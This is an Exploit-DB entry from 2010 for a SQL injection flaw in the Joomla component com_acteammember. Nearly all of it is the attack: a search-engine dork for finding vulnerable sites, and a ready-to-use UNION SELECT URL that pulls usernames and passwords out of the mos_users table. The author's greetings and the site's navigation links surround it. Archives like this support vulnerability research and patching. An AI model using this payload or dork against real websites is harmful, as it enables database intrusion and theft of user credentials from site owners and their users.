Joomla! Component com_acteammember - SQL Injection

EDB-ID:

11483

CVE:

N/A

EDB Verified:

Author:

ALTBTA

Type:

webapps

Exploit: /

Platform:

PHP

Date:

2010-02-17

Vulnerable App:

Joomla Component com_acteammember Sql Injection Vulnerability
==============================================================

####################################################################
.:. Author : altbta [l_9@hotmail.com<mailto:l_9@hotmail.com>]
.:. Home : www.v4-team.com/cc<http://www.v4-team.com/cc>
.:. Dork : inurl:"com_acteammember"

####################################################################

===[ Exploit ]===

www.site.com/index.php?option=com_acteammember&id=[SQL]&Itemid=121&lang=en


http://server/index.php?option=com_acteammember&id=-1+UNION+SELECT+1,2,3,4,5,concat(username,0x20,password),7,8,9,10,11,12,13,14,15+from+mos_users--&Itemid=121&lang=en


####################################################################
Greats T0: aB0-3tH4b T3rR0r & RxH
Thanks T0: AtT4CKxT3rR0r1ST

Tags:

Advisory/Source: Link

Databases	Links	Sites	Solutions
Exploits	Search Exploit-DB	OffSec	Courses and Certifications
Google Hacking	Submit Entry	Kali Linux	Learn Subscriptions
Papers	SearchSploit Manual	VulnHub	OffSec Cyber Range
Shellcodes	Exploit Statistics		Proving Grounds
			Penetration Testing Services